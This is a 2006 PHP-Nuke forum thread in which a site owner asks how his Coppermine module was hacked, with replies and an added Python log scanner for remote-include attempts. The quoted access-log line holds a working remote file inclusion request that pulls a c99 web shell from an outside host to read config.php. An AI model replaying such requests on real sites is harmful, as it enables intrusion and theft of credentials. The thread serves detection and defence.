Author |
Message |
Jenses
New Member


Joined: Feb 15, 2006
Posts: 6
|
Posted:
Thu Feb 16, 2006 1:59 pm |
|
Got hacked by this kind of method (from my site's log)
Code:
85.97.105.136 - - [16/Feb/2006:01:21:35 +0100] "GET /modules/coppermine/themes/maze/theme.php?THEME_DIR=http%3A%2F%2Fwww.funmekani.com%2Fq%2Fc99shell.txt%3F&act=f&f=config.php&d=%2Fxxxx%2Fxxxx%2Fxxxx%2Fxxxxx%2Fdomain.dk& HTTP/1.1" 200 6224
|
(xxx are replacements from my actual path)
I do know that the theme.php was obsolete and apparently included some bug - this file is removed, but how can I know if there are other files like this one that will open a back door to my system?
My domain is Danish so right now many Turkish hackers find it to be their right to hack me (Muhammed cartoons).
I can ban all Turkish IPs - but then they just let their relatives in Europe do it.
Isn't there a way to catch this kind of hack attempt? |
|
|
|
 |
Raven
Site Admin/Owner

Joined: Aug 27, 2002
Posts: 17088
|
Posted:
Thu Feb 16, 2006 2:01 pm |
|
Get rid of Coppermine if you use nuke. We can't reiterate this enough. Just search the forums for information. |
|
|
|
 |
jaded
Theme Guru

Joined: Nov 01, 2003
Posts: 1006
|
Posted:
Thu Feb 16, 2006 2:26 pm |
|
|
|
 |
Raven

|
Posted:
Thu Feb 16, 2006 4:50 pm |
|
Jenses, are you at patch level 2, 3, or 4 of NukeSentinel v2.4.2? The reason I ask is that I have code in there that would have stopped that. |
|
|
|
 |
evaders99
Former Moderator in Good Standing

Joined: Apr 30, 2004
Posts: 3221
|
Posted:
Thu Feb 16, 2006 5:20 pm |
|
There is code that would have detected this particular Coppermine vulnerability? Or just the cross-scripting part?
What blocker is this in? |
|
|
 |
Raven

|
Posted:
Thu Feb 16, 2006 5:49 pm |
|
XSS in includes/nukesentinel.php; pl2, I believe, handles the hex, and there's other code to trap http:// in the URL request. |
|
|
|
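The check described in the post above (undo the hex encoding, then trap http:// in the request), applied offline to access-log lines as an added example; it is not NukeSentinel's code. The sample log lines, the function names, and the rule that a parameter value must start with a URL scheme are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache common/combined format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# Assumption: a value that *starts* with a URL scheme is a remote-include candidate.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (documentation IPs and example.org), shaped like the log above.
SAMPLE_LOG = """\
192.0.2.10 - - [16/Feb/2006:01:21:35 +0100] "GET /modules/coppermine/themes/maze/theme.php?THEME_DIR=http%3A%2F%2Fexample.org%2Fq%2Fx.txt%3F&act=f HTTP/1.1" 200 6224
192.0.2.11 - - [16/Feb/2006:01:25:02 +0100] "GET /modules/coppermine/themes/maze/theme.php?THEME_DIR=%2568ttp%253A%252F%252Fexample.org%252Fx.txt HTTP/1.1" 404 312
198.51.100.7 - - [16/Feb/2006:02:00:10 +0100] "GET /modules.php?name=Forums&file=viewtopic&t=123 HTTP/1.1" 200 5120
198.51.100.8 - - [16/Feb/2006:02:03:44 +0100] "GET /modules.php?name=Search&query=what+is+http%3A%2F%2F HTTP/1.1" 200 2048
"""

def fully_decode(value, max_rounds=3):
    """Percent-decode until stable so double-encoded schemes (%2568ttp) are exposed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_remote_includes(line):
    """Return (ip, path, param, decoded_value, status) for each suspicious parameter."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_decode(value)  # parse_qsl has already decoded one layer
        if REMOTE_RE.match(value):
            hits.append((m.group("ip"), parts.path, name, value, int(m.group("status"))))
    return hits

def scan(log_text):
    """Scan a whole log; a 200 status means the targeted script exists and answered."""
    return [hit for line in log_text.splitlines() for hit in find_remote_includes(line)]

if __name__ == "__main__":
    for ip, path, param, value, status in scan(SAMPLE_LOG):
        print(f"{ip} {path} {param}={value!r} status={status}")
```

Hits with status 200 deserve attention first, since the requested script was present and responded; 404 hits only show probing.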
 |
evaders99

|
Posted:
Thu Feb 16, 2006 10:24 pm |
|
Alright, just curious if there is a way to detect such things directly. We could block all these robots trying various exploits for awstats, other Nuke forks, etc. I'm currently using DisError, so when it gets a 404, it passes through a page where I can filter on what they were trying to do. |
|
|
|
 |
Jenses

|
Posted:
Fri Feb 17, 2006 3:10 am |
|
Hi Raven
I'm on the newest 2.4.2pl4 - have added the pc-killer
I find it a little 'cheap' to say 'get rid of' - we should be able to detect vulnerabilities so code can be changed to stop exploits - I wonder if anyone made a tool to test modules systematically for all known exploits? |
|
|
|
 |
Raven

|
Posted:
Fri Feb 17, 2006 3:50 am |
|
I actually have one started but I put it on the back burner. So, from me, at least, the answer is no. |
|
|
|
 |
Jenses

|
Posted:
Fri Feb 17, 2006 7:22 am |
|
Hope to see that one soon - in the meantime I add the normal "if (!defined('MODULE_FILE')) {..." to my 3rd-party modules
- - and ban all Turkish IPs from my sites |
|
|
|
 |
jaded

|
Posted:
Fri Feb 17, 2006 7:52 am |
|
That will not be enough to secure Coppermine. Most of us strongly suggest that you remove it entirely. Best of luck to you. |
|
|
|
 |
|